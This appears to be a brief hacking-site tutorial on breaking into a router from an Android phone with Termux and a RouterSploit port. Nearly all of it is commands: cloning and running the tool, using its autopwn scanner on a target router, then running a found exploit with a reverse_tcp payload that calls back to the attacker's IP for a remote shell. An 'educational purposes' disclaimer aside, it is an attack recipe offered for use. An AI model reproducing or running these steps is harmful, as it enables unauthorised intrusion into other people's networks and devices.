Hack a router from an android phone

Hack a router from an android phone

Disclaimer: Everything on this site is for educational purposes and should not be used for evil.

You will need:

Termux
Router IP
Your IP

Tutorial:

Run the following commands:
pip install future
apt install git figlet
git clone https://github.com/41Team/RoutersploitTermux
cd RoutersploitTermux
bash run.sh
Now wait for it to finish and you will get this message when it does:
So lets execute it!
cd ..
cd routersploit
python rsf.py
You will get this screen:
Now, lets test the router:
use scanners/autopwnset
target [Router IP]
exploit
If your router isn't vulnerable you will get this message:
If it is, you will get this message:
To use the exploit type:
use [path to exploit as shown in result]
set target [Router IP]
check
run
set payload reverse_tcp
set lhost [Your IP]
run

Comments